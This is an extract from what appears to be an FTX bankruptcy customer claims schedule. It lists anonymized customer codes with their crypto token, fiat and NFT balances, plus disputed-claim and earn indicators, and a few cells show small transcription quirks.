| 07324908 | | DOGE[1], LTC[0], USD[0.76] | | |
| 07324909 | | USD[10.00] | | |
| 07324912 | | USD[10.00] | | |
| 07324913 | | CUSDT[4], DOGE[0], USD[320.72] | | |
| 07324915 | | USD[10.00] | | |
| 07324916 | | USD[0.00] | | |
| 07324918 | | USD[10.00] | | |
| 07324919 | | USD[10.00] | | |
| 07324920 | | USD[0.00] | | |
| 07324921 | | USD[10.00] | | |
| 07324922 | | ETH[0], ETHW[0], GRT[.62353451], USD[0.00] | | |
| 07324923 | | CUSDT[2], SHIB[786109.53929914], USD[0.00] | | |
| 07324924 | | USD[10.00] | | |
| 07324925 | | BAT[6], BRZ[1], BTC[0], CUSDT[3], DOGE[0], GRT[1], TRX[7], UNI[2], USD[0.00], USDT[0] | | |
| 07324926 | | CUSDT[13], DOGE[0], LTC[0], TRX[1], USD[0.00] | | |
| 07324927 | | BRZ[1], BTC[0], CUSDT[2], DOGE[1], TRX[2], USD[0.00] | | |
| 07324928 | | USD[10.00] | | |
| 07324929 | | BAT[57.6838306], BCH[.02624795], BRZ[111.14344767], CUSDT[2], DOGE[496.07223921], ETH[.12980371], ETHW[.12980371], GRT[17.03195483], LINK[1.03463316], LTC[.12163949], SOL[15.1354642], SUSHI[12.3232348], TRX[710.4527779], UNI[1.00472663], USD[0.00] | | |
| 07324931 | | USD[10.00] | | |
| 07324932 | | USD[10.00] | | |
| 07324934 | | DOGE[1], LTC[0], USD[0.00] | | |
| 07324935 | | BRZ[2], CUSDT[1], DOGE[381.02554612], TRX[1], USD[2.22] | | |
| 07324937 | | CUSDT[2], DOGE[41.21794519], TRX[1], USD[0.00] | | |
| 07324938 | | USD[10.00] | | |
| 07324939 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07324942 | | SHIB[151034.5869204], USD[0.00] | | |
| 07324943 | | USD[0.00] | | |
| 07324944 | | DOGE[194.85314178], USD[0.00] | Yes | |
| 07324945 | | USD[10.00] | | |
| 07324946 | | BRZ[4], CUSDT[3], GRT[1], TRX[2.18432029], USD[0.00] | | |
| 07324948 | | USD[10.00] | | |
| 07324949 | | USD[10.00] | | |
| 07324950 | | USD[0.00] | | |
| 07324951 | | USD[10.00] | | |
| 07324953 | | BTC[.00020716], USD[0.00] | | |
| 07324954 | | USD[0.00] | | |
| 07324955 | | BRZ[2], CUSDT[8], ETH[.00052786], ETHW[.00052786], USD[0.61] | | |
| 07324956 | | DOGE[6], GRT[4.3614834], SUSHI[0], TRX[4], USD[0.00] | | |
| 07324957 | | BRZ[0], BTC[0], DOGE[0], ETH[0.00000721], ETHW[0.00000721], SOL[0], SUSHI[0], USD[0.01], USDT[0] | Yes | |
| 07324959 | | LTC[.03575652], USD[0.00] | | |
| 07324960 | | BTC[.0241494], DOGE[.282], USD[8.78] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07324961 | | USD[0.00] | | |
| 07324962 | | BTC[.05638503], CUSDT[3], DOGE[10808.03850833], ETH[.53755437], ETHW[.53755437], TRX[2], USD[0.00] | | |
| 07324963 | | DOGE[1], USD[0.01] | | |
| 07324965 | | ETH[.00568792], ETHW[.00568792], USD[10.00] | | |
| 07324966 | | GRT[.00009681], USD[0.00] | Yes | |
| 07324967 | | USD[10.00] | | |
| 07324968 | | USD[10.00] | | |
| 07324969 | | DOGE[6.9734], USD[0.54] | | |
| 07324970 | | BAT[44.82], CUSDT[.32], DOGE[.111], ETH[.0001], ETHW[.231818], GRT[.96], LINK[2.0979], SOL[.0489], SUSHI[3.4965], TRX[.54], UNI[.0932], USD[0.07] | | |
| 07324971 | | GRT[1.00026477], KSHIB[661.63366349], SHIB[785800.01198584], TRX[1], USD[0.00] | Yes | |
| 07324972 | | BRZ[.51688769], BTC[.00116149], DOGE[2], USD[0.00] | | |
| 07324973 | | BTC[.00019979], DOGE[0], TRX[1], UNI[0], USD[0.00] | | |
| 07324974 | | USD[10.00] | | |
| 07324975 | | DOGE[201.57140371], USD[0.00] | | |
| 07324976 | | DOGE[155.77534104], TRX[1], USD[0.00] | Yes | |
| 07324977 | | ETH[.0985], ETHW[.0985], USD[10.00] | | |
| 07324980 | | BRZ[1], USD[0.00] | | |
| 07324981 | | USD[0.00] | | |
| 07324982 | | BRZ[1], CUSDT[1], DOGE[149.19330927], SHIB[1], TRX[2], USD[0.00] | | |
| 07324983 | | USD[10.00] | | |
| 07324984 | | BRZ[1], CUSDT[4], DOGE[.27079785], LINK[.0000956], TRX[1], USD[0.24] | | |
| 07324985 | | CUSDT[3], DOGE[198.79458682], GRT[9.8182397], USD[0.00] | Yes | |
| 07324987 | | USD[10.00] | | |
| 07324988 | | USD[10.00] | | |
| 07324989 | | DOGE[541.957], SHIB[1895879.44161485], USD[0.00] | | |
| 07324990 | | BTC[0], DAI[0], ETH[0], ETHW[0], LINK[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07324991 | | BAT[0], DOGE[1], USD[0.00] | | |
| 07324993 | | BAT[14.99877661], CUSDT[108.66405421], SOL[1.7787459], TRX[442.80293331], USD[0.47] | Yes | |
| 07324994 | | DOGE[162.65732805], USD[0.00] | | |
| 07324995 | | DOGE[0], ETH[0.00000104], ETHW[0.00000103], NFT (371752463536266700/Imola Ticket Stub #118)[1], NFT (560293428405365678/Barcelona Ticket Stub #1149)[1], SHIB[8], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07324996 | | USD[10.00] | | |
| 07324997 | | GRT[2], USD[0.00] | | |
| 07324998 | | BTC[0], DOGE[1639.74380694], USD[0.01], USDT[0] | | |
| 07324999 | | USD[10.00] | | |
| 07325000 | | USD[10.00] | | |
| 07325001 | | CUSDT[1], DOGE[1074.94503442], USD[230.38] | Yes | |
| 07325002 | | SHIB[4], USD[0.17] | Yes | |
| 07325003 | | USD[10.00] | | |
| 07325005 | | BRZ[1], CUSDT[5], DOGE[.00019007], SHIB[2], TRX[1290.10035862], USD[0.00] | Yes | |
| 07325006 | | USD[10.00] | | |
| 07325008 | | CUSDT[2], USD[0.01] | | |
| 07325009 | | USD[10.00] | | |
| 07325010 | | BTC[.01815735], DOGE[1023.74453163], ETH[.58552062], ETHW[.58552062], LINK[35.69332717], SOL[142.51860445], SUSHI[35.43887156], UNI[16.22842181], USD[0.00], USDT[0] | | |
| 07325011 | | DOGE[0], ETH[0], ETHW[0], SHIB[2], USD[272.28] | | |
| 07325012 | | USD[10.00] | | |
| 07325013 | | USD[10.00] | | |
| 07325014 | | USD[10.00] | | |
| 07325015 | | USD[10.00] | | |
| 07325016 | | USD[10.00] | | |
| 07325017 | | USD[8.67] | | |
| 07325018 | | DAI[.00000001], ETH[.00000193], ETHW[0], SUSHI[0], USD[0.02], USDT[0] | | |
| 07325019 | | USD[10.00] | | |
| 07325021 | | TRX[4], USD[0.06] | | |
| 07325022 | | USD[10.00] | | |
| 07325023 | | BTC[0], CUSDT[8], DOGE[1], ETH[.00364024], ETHW[.00364024], SOL[0], USD[0.00] | | |
| 07325024 | | CUSDT[1], TRX[173.96069358], USD[0.00] | | |
| 07325025 | | SHIB[1055.98426966], TRX[3], USD[0.00] | | |
| 07325026 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325027 | | DOGE[231.16587584], USD[30.00] | | |
| 07325030 | | USD[0.08] | | |
| 07325031 | | DOGE[0], USD[0.00], USDT[0.00002472] | | |
| 07325032 | | USD[10.00] | | |
| 07325033 | | USD[10.00] | | |
| 07325034 | | USD[0.00] | | |
| 07325037 | | USD[0.00] | | |
| 07325038 | | USD[10.00] | | |
| 07325039 | | USD[10.00] | | |
| 07325040 | | USD[10.00] | | |
| 07325041 | | USD[10.00] | | |
| 07325042 | | USD[10.00] | | |
| 07325043 | | USD[10.00] | | |
| 07325044 | | BTC[.00004363], CUSDT[64.06815269], DOGE[22.90933853], SHIB[280753.58594729], SOL[.1304652], TRX[40.85484617], USD[0.00] | Yes | |
| 07325045 | | BRZ[0], BTC[.01023326], CUSDT[13], DOGE[7442.67168417], ETH[.06369549], ETHW[.0629031], TRX[4], USD[0.02] | Yes | |
| 07325046 | | USD[10.00] | | |
| 07325047 | | ETH[.00178], ETHW[.00178], USD[2.17] | | |
| 07325048 | | USD[10.00] | | |
| 07325049 | | BAT[16.61269724], USD[0.00] | | |
| 07325050 | | USD[10.00] | | |
| 07325051 | | USD[10.00] | | |
| 07325052 | | NFT [42004173489560829O/Coachella x FTX Weekend 2 #27608][1], USD[10.00] | | |
| 07325053 | | USD[10.00] | | |
| 07325054 | | USD[10.00] | | |
| 07325055 | | USD[0.00] | | |
| 07325056 | | DOGE[0.00000005], USD[0.19] | | |
| 07325057 | | USD[10.00] | | |
| 07325058 | | BTC[0], DOGE[1164.30893029], ETH[0], SHIB[0], SOL[0], USD[0.00] | | |
| 07325059 | | USD[10.00] | | |
| 07325060 | | USD[10.00] | | |
| 07325061 | | USD[10.00] | | |
| 07325062 | | USD[10.00] | | |
| 07325063 | | USD[0.00] | | |
| 07325064 | | USD[10.00] | | |
| 07325065 | | USD[10.00] | | |
| 07325066 | | USD[10.00] | | |
| 07325067 | | DOGE[2000.39091639], USD[0.01] | | |
| 07325068 | | USD[0.21] | | |
| 07325069 | | USD[10.00] | | |
| 07325070 | | CUSDT[1], DOGE[7310.18883378], USD[0.00] | | |
| 07325071 | | BTC[0.00000887], USD[0.00] | | |
| 07325072 | | USD[0.00], USDT[0] | Yes | |
| 07325075 | | SOL[.65410704], USD[0.00] | | |
| 07325076 | | CUSDT[2], DOGE[.09459642], USD[0.81] | | |
| 07325077 | | BRZ[5], CUSDT[12], DOGE[1], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[12], USD[0.00], USDT[0], YFI[0] | | |
| 07325078 | | USD[10.00] | | |
| 07325079 | | USD[0.08] | Yes | |
| 07325081 | | USD[10.00] | | |
| 07325082 | | USD[10.00] | | |
| 07325083 | | USD[10.00] | | |
| 07325084 | | BRZ[1], CUSDT[1], DOGE[6477.25130789], ETH[.4158664], ETHW[.4158664], GRT[3], NFT (37006597986603671B/SOLYETIS #7981)[1], SHIB[1], USD[74.24] | | |
| 07325085 | | USD[10.00] | | |
| 07325086 | | BAT[0], DOGE[0], SOL[0], USD[0.01] | | |
| 07325087 | | BTC[0], DOGE[0], SUSHI[0], USD[84.97] | | |
| 07325088 | | TRX[.747], USD[10.00], USDT[0] | | |
| 07325090 | | BTC[.00000005], ETHW[.37928368], TRX[.00265642], USD[670.85] | Yes | |
| 07325091 | | DOGE[0], ETH[0], LTC[0], USD[0.00] | | |
| 07325093 | | CUSDT[4], DOGE[25.14358692], TRX[1], USD[7.32] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325094 | | DOGE[109.171], USD[8.91] | | |
| 07325096 | Contingent, Disputed | DOGE[3.000548], USD[0.99], USDT[0] | Yes | |
| 07325097 | | USD[0.00] | | |
| 07325099 | | USD[0.30] | | |
| 07325101 | | BTC[.00009105], CUSDT[1], DOGE[88.46901988], ETH[.00280861], ETHW[.00280861], TRX[5], USD[82.67] | | |
| 07325102 | | USD[10.00] | | |
| 07325103 | | USD[10.00] | | |
| 07325104 | | DOGE[131.80073679], USD[10.00] | | |
| 07325105 | | SOL[0.81023169], TRX[1], USD[0.00] | | |
| 07325106 | | USD[10.00] | | |
| 07325107 | | SHIB[22620.09931892], USD[0.00] | Yes | |
| 07325108 | | USD[10.00] | | |
| 07325109 | | USD[0.01] | | |
| 07325110 | | USD[10.00] | | |
| 07325111 | | DOGE[1], USD[0.00] | Yes | |
| 07325112 | | USD[10.00] | | |
| 07325113 | | USD[10.00] | | |
| 07325115 | | SOL[0], USD[0.16], USDT[0.00000032] | | |
| 07325116 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07325118 | | USD[10.00] | | |
| 07325119 | | CUSDT[2], DOGE[1.00004324], SOL[.00004593], TRX[0.00002115], USD[0.00] | | |
| 07325120 | | BRZ[1], DOGE[283.79748638], SHIB[1011136.46567839], USD[0.00] | Yes | |
| 07325121 | | TRX[1], USD[309.50] | | |
| 07325124 | | USD[10.00] | | |
| 07325126 | | USD[0.00] | | |
| 07325127 | | DOGE[61.76390709], ETH[0.00358625], ETHW[0.00358625], USD[0.00] | | |
| 07325128 | | CUSDT[1], DOGE[783.83520311], USD[0.00] | | |
| 07325129 | | TRX[219.92638623], USD[0.00] | | |
| 07325130 | | BAT[1], BRZ[1], CUSDT[4], DOGE[1], SOL[.00002307], TRX[4], USD[0.00] | | |
| 07325135 | | USD[10.00] | | |
| 07325136 | | DOGE[30.69548321], USD[0.00] | | |
| 07325137 | | CUSDT[1], USD[6.45] | | |
| 07325138 | | CUSDT[10], DOGE[4351.69731092], TRX[2], USD[0.00] | | |
| 07325139 | | USD[10.00] | | |
| 07325140 | | DOGE[542.34381056], USD[0.00] | | |
| 07325141 | | CUSDT[1], DOGE[1], USD[30.98] | | |
| 07325142 | | BRZ[0], DOGE[0], TRX[0], USD[10.00], USDT[0] | | |
| 07325145 | | LTC[0], TRX[.000009], USD[0.67], USDT[.007722] | | |
| 07325147 | | USD[10.00] | | |
| 07325148 | | DOGE[6229.29850357], USD[0.00] | | |
| 07325149 | | BRZ[1], CUSDT[1], GRT[1], TRX[438.69145711], USD[0.00] | Yes | |
| 07325150 | | BAT[14.01424946], DOGE[4730.68673487], TRX[1], USD[0.00] | | |
| 07325152 | | DOGE[0] | | |
| 07325153 | | USD[10.00] | | |
| 07325154 | | USD[10.00] | | |
| 07325156 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07325157 | | BRZ[1.00007066], BTC[0], CUSDT[9], DOGE[2.00297339], ETH[0], GRT[.00157768], TRX[2], USD[0.00], USDT[0.00075654] | Yes | |
| 07325158 | | USD[10.00] | | |
| 07325161 | | CUSDT[2], DOGE[49.43094434], SHIB[266316.17057428], USD[0.00] | Yes | |
| 07325162 | | TRX[1], USD[10.00] | | |
| 07325164 | | BTC[.00014353], DOGE[16445.15777449], TRX[2], USD[0.01] | | |
| 07325165 | | USD[10.00] | | |
| 07325166 | | AVAX[.00000055], BF_POINT[12700], CUSDT[0.64850930], ETH[0], SOL[0], USD[-0.01], USDT[0] | | |
| 07325167 | | TRX[1], USD[0.01] | | |
| 07325168 | | CUSDT[2], DOGE[.18212585], USD[0.00] | | |
| 07325170 | | USD[10.00] | | |
| 07325171 | | BTC[.00088504], TRX[0], USD[0.05] | | |
| 07325173 | | BRZ[1], CUSDT[2], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325177 | | BRZ[1], BTC[0], CUSDT[3], DOGE[1328.59882217], TRX[1], USD[0.00] | | |
| 07325178 | | USD[10.00] | | |
| 07325179 | | USD[0.01] | | |
| 07325180 | | SHIB[1], USD[800.01] | | |
| 07325182 | | BAT[17.24513429], CUSDT[1], DOGE[660.46930002], GRT[2.64210593], TRX[62.36970011], USD[0.00] | Yes | |
| 07325183 | | USD[0.00] | Yes | |
| 07325184 | | USD[10.00] | | |
| 07325188 | | USD[10.00] | | |
| 07325189 | | DOGE[1], USD[0.01], USDT[0.00000001] | | |
| 07325191 | | DOGE[0], USD[0.00] | Yes | |
| 07325192 | | CUSDT[1], DOGE[5336.33260916], USD[0.00] | | |
| 07325194 | | USD[10.00] | | |
| 07325195 | | CUSDT[1], ETH[.00835127], ETHW[.00835127], TRX[1], USD[0.00] | | |
| 07325196 | | BRZ[1], CUSDT[1], DOGE[19.76475485], USD[0.01] | | |
| 07325197 | | BAT[4.26914884], BRZ[6.19804685], BTC[0], CUSDT[5], DOGE[19.18740088], ETH[0], GRT[1.01354145], SHIB[3], SOL[0], TRX[11.30787465], USD[0.00], USDT[1.06110523] | Yes | |
| 07325198 | Contingent, Disputed | DOGE[33.62065997], USD[0.00] | | |
| 07325200 | | DOGE[1379.81920948] | | |
| 07325202 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07325203 | | DOGE[1], USD[0.00] | | |
| 07325205 | | USD[10.00] | | |
| 07325206 | | SOL[0], USD[0.00] | Yes | |
| 07325208 | Contingent, Disputed | BRZ[3], CUSDT[15], LINK[.00008136], USD[0.00], USDT[1.1036114] | Yes | |
| 07325209 | | BTC[0], DOGE[3507.42862123], ETH[0], TRX[1], USD[0.00], USDT[0] | | |
| 07325211 | | USD[10.00] | | |
| 07325215 | | CUSDT[1], DOGE[1], SHIB[3], TRX[1], USD[0.00] | | |
| 07325216 | | DOGE[2], ETH[1.89403267], ETHW[1.8932372], TRX[2.00003588], USD[0.00] | Yes | |
| 07325218 | | USD[10.00] | | |
| 07325219 | | BRZ[1], NFT (370625908662016703/Entrance Voucher #1078)[1], SHIB[.16599379], USD[0.00] | Yes | |
| 07325222 | | BRZ[1], CUSDT[59.86479264], DOGE[3], ETHW[.05500735], SHIB[1], SUSHI[1.83736613], TRX[98.16999736], USD[0.01] | Yes | |
| 07325223 | | BTC[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07325224 | | BRZ[0], BTC[0.00002716], USD[0.00] | | |
| 07325225 | | BTC[0.00000963], DOGE[.16], ETH[.000024], ETHW[.000974], LTC[.01071955], SOL[.00079963], SUSHI[.086835], USD[0.27] | | |
| 07325226 | | USD[10.00] | | |
| 07325229 | | USD[10.00] | | |
| 07325231 | | BRZ[2], CUSDT[4], USD[0.00], USDT[0.00001848] | | |
| 07325232 | | BTC[.00018883], USD[0.00] | | |
| 07325233 | | USD[10.00] | | |
| 07325234 | | USD[0.00] | | |
| 07325235 | | CUSDT[10], SHIB[1], TRX[5], USD[0.00], USDT[2] | | |
| 07325237 | | CUSDT[2], DOGE[58.11504335], USD[0.00] | | |
| 07325238 | | USD[10.00] | | |
| 07325239 | | DOGE[0], ETH[0], USD[34.35] | | |
| 07325240 | | USD[10.00] | | |
| 07325241 | Contingent, Disputed | CUSDT[1], DOGE[2], USD[0.00] | Yes | |
| 07325243 | | CUSDT[1], DOGE[17.23119003], USD[0.00] | | |
| 07325244 | | DOGE[4995.59594927], USD[0.00] | Yes | |
| 07325246 | | USD[0.00] | | |
| 07325247 | | CUSDT[1], DOGE[1], GRT[1], TRX[1], USD[0.49] | | |
| 07325248 | | BTC[.00007168], USDT[.0936296] | | |
| 07325249 | | USD[0.00] | | |
| 07325251 | | USD[10.00] | | |
| 07325252 | | USD[10.00] | | |
| 07325253 | | CUSDT[1], DOGE[1.00003696], USD[0.01] | | |
| 07325254 | | DOGE[0], ETHW[.03077084], USD[0.16] | | |
| 07325255 | | BAT[2.05765741], BRZ[7.3554484], CUSDT[3], DOGE[783.38016216], GRT[1.00314541], SHIB[1], SUSHI[1.09390637], TRX[6], USD[0.01] | Yes | |
| 07325256 | | BAT[30.28631162], BRZ[3], CUSDT[17], DOGE[23.09678793], ETH[.02586043], ETHW[.02586043], LTC[.34154707], SOL[3.42079847], TRX[1192.0282226], USD[0.00] | | |
| 07325258 | | USD[10.00] | | |
| 07325259 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325260 | | BAT[1], BRZ[1], CUSDT[11], ETH[.01955309], ETHW[.01955309], KSHIB[255.39313687], TRX[1], USD[0.01] | | |
| 07325261 | | USD[0.01] | Yes | |
| 07325262 | | USD[10.00] | | |
| 07325263 | | USD[10.00] | | |
| 07325264 | | BAT[1.0165555], BTC[.0000002], CUSDT[5], ETH[.00000712], ETHW[.00000712], GRT[1.00498957], TRX[1], USD[0.00], USDT[0.00001296] | Yes | |
| 07325265 | | ETH[0], USD[0.00] | | |
| 07325266 | | USD[0.00] | | |
| 07325267 | | BRZ[3], CUSDT[22], DOGE[2], TRX[8], USD[0.00] | | |
| 07325268 | | BTC[0.00009138], ETH[0], ETHW[0.45687033], USD[37.62], USDT[0] | | |
| 07325269 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07325270 | | USD[10.00] | | |
| 07325271 | | USD[10.00] | | |
| 07325273 | | CUSDT[1], TRX[98.76319632], USD[0.00] | Yes | |
| 07325274 | | BTC[0], DOGE[.0170035], USD[0.00] | | |
| 07325275 | | USD[10.00] | | |
| 07325276 | | BRZ[1], CUSDT[11], DOGE[348.08688387], LTC[.07843816], SHIB[188662.21962187], USD[0.00] | Yes | |
| 07325277 | | CUSDT[3], DOGE[.00003646], TRX[1], USD[12.24] | | |
| 07325278 | | USD[10.00] | | |
| 07325279 | | USD[10.00] | | |
| 07325282 | | DOGE[39.52877588], USD[0.00] | | |
| 07325284 | | BAT[1.01417009], BRZ[3], CUSDT[4], DOGE[7.29349668], GRT[3.1572699], SUSHI[1.09103945], TRX[6], USD[0.02], USDT[5.4812887] | Yes | |
| 07325285 | | USD[10.00] | | |
| 07325286 | | DOGE[1], ETH[.02879825], ETHW[.02879825], USD[10.00] | | |
| 07325287 | | USD[10.00] | | |
| 07325288 | | DOGE[173.88271228], USD[0.00] | | |
| 07325290 | | CUSDT[8], TRX[1], USD[0.00] | | |
| 07325291 | | USD[10.00] | | |
| 07325292 | | DOGE[344.55319868], USD[0.00] | | |
| 07325293 | | CUSDT[2], ETH[0.08960053], ETHW[0.08861783], GRT[0], SOL[0.19830701], SUSHI[0], UNI[.00016992], USD[0.00] | Yes | |
| 07325294 | | BRZ[1], DOGE[392.59983893], SOL[.57985103], USD[0.00], USDT[0] | Yes | |
| 07325296 | | USD[10.00] | | |
| 07325297 | | USD[10.00] | | |
| 07325298 | | USD[10.00] | | |
| 07325299 | | USD[10.00] | | |
| 07325301 | | DOGE[ 27956747], USD[0.00] | | |
| 07325302 | | CUSDT[4], USD[0.00] | | |
| 07325303 | | DOGE[.05728192], USD[0.21] | | |
| 07325304 | | CUSDT[2], MATIC[18.58559954], USD[0.00] | Yes | |
| 07325305 | | DOGE[.60965198], USD[10.00] | | |
| 07325306 | | BTC[.00038228], ETH[.2001216], ETHW[.16887767], LINK[12.26857356], MATIC[414.26378379], SOL[.08340973], TRX[2], USD[2994.54] | Yes | |
| 07325308 | | BTC[.00021035], USD[0.00] | | |
| 07325309 | Contingent, Disputed | CUSDT[1], USD[0.01] | | |
| 07325310 | | USD[10.00] | | |
| 07325311 | | USD[10.00] | | |
| 07325312 | | USD[0.01] | Yes | |
| 07325313 | | USD[10.00] | | |
| 07325314 | | USD[0.01] | Yes | |
| 07325315 | | USD[10.00] | | |
| 07325317 | | USD[10.00] | | |
| 07325319 | | BTC[0], DOGE[0], USD[0.41] | | |
| 07325320 | | CUSDT[5], GRT[0], USD[0.00] | Yes | |
| 07325321 | | GRT[4.97997321], TRX[1], USD[0.00] | Yes | |
| 07325323 | | USD[10.00] | | |
| 07325324 | | DOGE[3625.1718], USD[0.03] | | |
| 07325325 | | USD[10.00] | | |
| 07325326 | | BRZ[1], CUSDT[4], DOGE[0], USD[0.00] | | |
| 07325327 | | USD[0.01] | | |
| 07325330 | | USD[11.04] | Yes | |

| Customer Code | Contingent, or Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325332 | | USD[10.00] | | |
| 07325333 | | DOGE[.7807], SUSHI[7.85343055], USD[86.33] | | |
| 07325335 | | USD[10.00] | | |
| 07325336 | | BAT[1], CUSDT[2], DOGE[2], USD[0.00] | | |
| 07325337 | | USD[10.00] | | |
| 07325339 | | USD[10.00] | | |
| 07325340 | | DOGE[30.09768655], USD[0.00] | | |
| 07325342 | | USD[10.00] | | |
| 07325343 | | DOGE[0], ETH[0], LINK[0], SOL[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07325344 | | BAT[53.46381703], BCH[.14811096], DOGE[13611.75373228], NFT (338253154037610614/Entrance Voucher #19287)[1], NFT (571300083997252513/Nasumbati "Certain Vibes" Track Cover Art)[1], SHIB[2], SOL[4.44623665], TRX[2792.0768055], USD[0.00] | Yes | |
| 07325346 | | DOGE[1.00001955], TRX[.00003689], USD[0.00] | | |
| 07325347 | | USD[10.84] | Yes | |
| 07325349 | | ETH[0], ETHW[0], SOL[0], USD[2.31] | Yes | |
| 07325350 | | ETH[.00332878], ETHW[.00328774], USD[0.00] | Yes | |
| 07325351 | | USD[10.00] | | |
| 07325352 | | BAT[1], CUSDT[4], DOGE[1.00015797], ETH[.00000005], ETHW[.00000005], TRX[1.0007678], USD[0.01] | | |
| 07325353 | | BAT[1], DOGE[.68086024], USD[0.01] | | |
| 07325356 | | USD[10.00] | | |
| 07325357 | | USD[10.00] | | |
| 07325359 | | DOGE[129.57097237], USD[0.00] | | |
| 07325360 | | USD[10.00] | | |
| 07325361 | | CUSDT[1], DOGE[20.04159813], USD[0.00] | | |
| 07325362 | | USD[10.00] | | |
| 07325364 | | USD[10.00] | | |
| 07325365 | | DOGE[176.91537429], USD[0.00] | | |
| 07325366 | | USD[10.00] | | |
| 07325367 | | USD[10.00] | | |
| 07325368 | | ETH[0], ETHW[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07325369 | | USD[10.00] | | |
| 07325370 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], USD[0.00], USDT[0] | Yes | |
| 07325371 | | USD[10.00] | | |
| 07325374 | | USD[10.00] | | |
| 07325375 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07325378 | | BRZ[1], CUSDT[7], DOGE[10864.96521995], SHIB[4142633.2611963], TRX[1], USD[0.08] | Yes | |
| 07325379 | | BRZ[3], CUSDT[5], DOGE[1.00364111], NFT (311265200525109194/FTX - Off The Grid Miami #2781)[1], SHIB[0], TRX[6], USD[0.02] | Yes | |
| 07325380 | | USD[10.00] | | |
| 07325382 | | CUSDT[4], DOGE[2130.38159455], USD[0.00] | Yes | |
| 07325385 | | BTC[0], CUSDT[7], DOGE[0], USD[303.94] | Yes | |
| 07325386 | | BRZ[522.56681264], CUSDT[1], USD[10.00] | | |
| 07325387 | | DOGE[437.25412456], USD[0.00] | | |
| 07325390 | | BAT[2.12821556], BRZ[2], CUSDT[2], DOGE[22332.54554639], GRT[1.00498957], USD[0.00], USDT[3.32418214] | Yes | |
| 07325393 | | USD[10.00] | | |
| 07325394 | | USD[10.00] | | |
| 07325395 | | USD[10.00] | | |
| 07325396 | | CUSDT[1], DOGE[0.04780884], TRX[1], USD[0.01] | Yes | |
| 07325397 | | USD[10.00] | | |
| 07325398 | | LINK[.008479], USD[0.00] | | |
| 07325399 | | USD[0.00], USDT[0] | | |
| 07325400 | | USD[10.00] | | |
| 07325402 | | ETH[.00467647], ETHW[.00467647], USD[0.00] | | |
| 07325403 | | USD[0.00] | | |
| 07325404 | | USD[10.00] | | |
| 07325406 | | USD[0.00] | | |
| 07325407 | | BAT[1], DOGE[2], ETH[0], USD[10.00], USDT[1] | | |
| 07325408 | | USD[10.00] | | |
| 07325409 | | SHIB[.00000002], USD[0.00], USDT[0] | | |
| 07325410 | | CUSDT[2], DOGE[21.27435337], USD[0.00] | | |
| 07325411 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325413 | | USD[10.00] | | |
| 07325414 | | TRX[1], USD[10.00] | | |
| 07325415 | | CUSDT[5], TRX[2], USD[0.00] | | |
| 07325416 | | CUSDT[3], DOGE[2584.36641271], ETH[.00600021], ETHW[.00593181], SOL[1.71758715], TRX[131.73079498], USD[0.00] | Yes | |
| 07325417 | Contingent, Disputed | USD[0.00] | Yes | |
| 07325418 | | USD[10.00] | | |
| 07325419 | | BAT[2], BRZ[2], DOGE[2], GRT[3], TRX[1], USD[0.00], USDT[1] | | |
| 07325420 | | USD[10.00] | | |
| 07325423 | | SHIB[81989.15129034], USD[0.00] | Yes | |
| 07325425 | | USD[70.00] | | |
| 07325426 | | TRX[1], UNI[.28995565], USD[0.00] | | |
| 07325427 | | CUSDT[1], DOGE[1.00331574], TRX[1], USD[0.03] | | |
| 07325428 | | USD[10.00] | | |
| 07325429 | | CUSDT[4], SOL[.34400445], TRX[1], USD[0.97] | Yes | |
| 07325430 | | BAT[1.0165555], BCH[.32375144], BRZ[3], BTC[.00380149], CUSDT[20], DOGE[4371.95348608], ETH[.20196956], ETHW[.20175796], LINK[37.12417196], LTC[1.12837465], SOL[2.82994293], SUSHI[3.33493442], TRX[657.33574926], USD[0.00], USDT[2.1757782] | Yes | |
| 07325431 | | USD[10.00] | | |
| 07325432 | | BAT[153.2215966], BF_POINT[200], BTC[0.02753413], CUSDT[2], DOGE[3], ETH[0.21708769], ETHW[0.21687187], GRT[1.0037421], LINK[54.27120418], LTC[3.26855178], MATIC[55.07279960], NFT [469413506036135647/FTX - Off The Grid Miami #5865](1], SOL[1.07993238], TRX[1], USD[0.00] | Yes | |
| 07325433 | | CUSDT[1], DOGE[33.85984733], USD[0.01] | Yes | |
| 07325435 | | USD[10.00] | | |
| 07325437 | | CUSDT[2], DOGE[1.27445518], LINK[1.05794724], SHIB[1], SOL[.00238518], TRX[2], USD[0.00] | Yes | |
| 07325439 | | USD[10.00] | | |
